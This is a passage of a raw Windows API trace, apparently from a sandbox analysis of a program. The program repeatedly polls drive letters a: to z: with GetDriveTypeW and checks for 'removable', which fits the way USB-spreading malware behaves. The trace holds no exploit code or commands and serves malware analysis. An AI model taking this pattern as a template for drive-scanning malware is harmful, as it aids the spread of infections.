lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0218.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.525] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0218.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.525] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0218.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0218.525] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0218.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.526] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.526] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.526] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.526] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.526] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.527] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.527] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.527] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.527] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.527] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.528] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.528] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.528] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.528] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.528] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.529] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.529] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.529] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.529] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.529] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.530] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.530] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.530] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.530] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.530] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.531] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.531] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0218.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.531] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0218.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0218.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0218.532] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0218.532] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0218.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.533] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0218.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0218.533] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0218.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.533] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0218.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.533] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0218.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.534] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.534] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.534] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.534] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0218.534] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.534] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.534] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.534] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.534] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.535] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.535] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.535] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.535] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.535] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.536] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.536] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.536] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.536] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.537] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.537] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.537] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.537] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.537] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.538] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.538] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.538] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.538] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.538] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.539] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.539] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.539] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.539] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.540] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.540] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.540] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.540] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.540] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.540] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.540] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.540] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.540] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.540] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0218.540] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.540] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.540] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.540] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.541] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.541] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.541] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.541] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.541] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.541] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0218.541] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.541] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0218.541] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326080 [0218.541] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.541] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.541] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.541] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326080 | out: hHeap=0x12c0000) returned 1 [0218.541] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.541] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.541] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0218.541] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.542] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0218.542] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.542] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.542] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.542] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.542] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.542] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.542] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.542] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.542] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.542] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.542] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.542] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0218.542] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0218.542] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.542] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0218.542] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.542] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.543] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.543] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.543] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0218.543] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.543] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.543] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0218.543] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.543] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.543] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0218.543] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.543] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.543] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.543] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.543] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.543] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.543] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.543] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.543] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.544] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.544] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.544] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.545] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.545] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.545] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.545] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.545] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.546] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.546] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.546] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.546] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.546] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.547] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.547] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.547] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.547] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.547] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.548] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.548] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.548] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.548] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.549] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.549] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.549] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.549] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.549] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.550] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0218.550] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.550] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.550] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.550] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.550] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.550] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.550] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.550] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.550] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.550] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.550] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0218.550] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f80 [0218.550] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f80 | out: hHeap=0x12c0000) returned 1 [0218.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.551] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0218.551] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0218.551] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, 